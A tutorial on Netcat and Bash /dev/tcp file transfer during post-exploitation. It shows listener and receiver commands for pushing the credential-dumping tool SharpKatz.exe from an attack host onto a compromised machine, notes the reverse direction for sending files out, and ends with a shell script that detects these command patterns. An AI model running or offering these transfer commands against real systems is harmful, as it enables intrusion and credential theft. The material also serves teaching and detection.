Netcat File Transfer

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP, which means that we can use it for file transfer operations.

The original Netcat was released by Hobbit in 1995, but it hasn’t been maintained despite its popularity.

File Transfer Methods

Either the target or the attacking machine can initiate the connection, which is helpful if a firewall prevents access to the target.

Method 1: Compromised Machine Listening

Compromised machine (listening):

nc -l -p 8000 > SharpKatz.exe

Attack host (sending):

nc -q 0 192.168.49.128 8000 < SharpKatz.exe

The -q 0 option tells Netcat to close the connection as soon as it reaches end-of-file on its input, so you’ll know when the file transfer has completed.

Method 2: Attack Host Listening

Attack host (listening):

sudo nc -l -p 443 -q 0 < SharpKatz.exe

Compromised machine (receiving):

nc 192.168.49.128 443 > SharpKatz.exe

This method is useful in scenarios where there’s a firewall blocking inbound connections.

Method 3: Using Bash /dev/tcp (No Netcat Required)

If Netcat is not available on the compromised machine, Bash itself supports read/write operations on the pseudo-device file /dev/tcp/.

Attack host (listening):

sudo nc -l -p 443 -q 0 < SharpKatz.exe

Compromised machine (receiving via /dev/tcp):

cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe

Using /dev/tcp/host/port in a redirection, for reading or for writing, makes Bash open a TCP connection to host:port, and this feature may be used for file transfers.

Note: The same operation can be used to transfer files from the compromised host to the attack host.

Common Options

  • -l: Listen mode
  • -p <port>: Specify port number
  • -q <seconds>: Wait specified seconds after EOF on stdin, then quit (0 = quit immediately)
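
From the defender's side, each method above leaves a recognizable command line. The following is an added example, not part of the original post: it classifies constructed command lines (as they would appear in shell history or a logged sh -c string, since redirections and /dev/tcp are handled by the shell) against the three patterns. The function names and labels are hypothetical.

```shell
#!/bin/sh
# Added example: classify shell command lines against the three transfer
# patterns shown on this page. Function names and labels are hypothetical.

# The nc binary name as a separate word (bare, after sudo, or as a full path).
NC_WORD='(^|[[:space:]/;|&])(nc|ncat|netcat)[[:space:]]+'

classify_cmdline() {
    line=$1
    # Method 3: Bash pseudo-device /dev/tcp/<host>/<port> (or /dev/udp)
    if printf '%s\n' "$line" | grep -Eq '/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'; then
        echo dev-tcp
    # Listener: an option cluster containing "l" after the nc binary name
    elif printf '%s\n' "$line" | grep -Eq "${NC_WORD}(.*[[:space:]])?-[a-zA-Z]*l[a-zA-Z]*([[:space:]]|\$)"; then
        echo nc-listener
    # Connecting side with stdin or stdout redirected to or from a file
    elif printf '%s\n' "$line" | grep -Eq "${NC_WORD}.*[<>]"; then
        echo nc-redirect
    else
        echo none
    fi
}

# Print "label<TAB>command" for every flagged line read from stdin.
scan_cmdlines() {
    while IFS= read -r line; do
        label=$(classify_cmdline "$line")
        [ "$label" = none ] || printf '%s\t%s\n' "$label" "$line"
    done
}

# Constructed sample input: the page's commands plus two benign lines.
sample_cmdlines() {
    cat <<'EOF'
nc -l -p 8000 > SharpKatz.exe
nc -q 0 192.168.49.128 8000 < SharpKatz.exe
sudo nc -l -p 443 -q 0 < SharpKatz.exe
cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
rsync -l /srv/data backup:/srv/data
ls -l /dev/tty
EOF
}

sample_cmdlines | scan_cmdlines
```

The two benign lines are there to show that a bare -l flag or a /dev path alone does not trigger a match.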